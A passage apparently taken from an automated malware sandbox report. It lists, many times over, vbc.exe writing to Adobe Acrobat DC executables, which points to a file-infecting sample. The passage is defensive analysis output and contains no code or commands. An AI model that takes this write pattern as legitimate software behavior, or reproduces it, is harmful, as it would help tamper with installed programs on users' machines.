                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
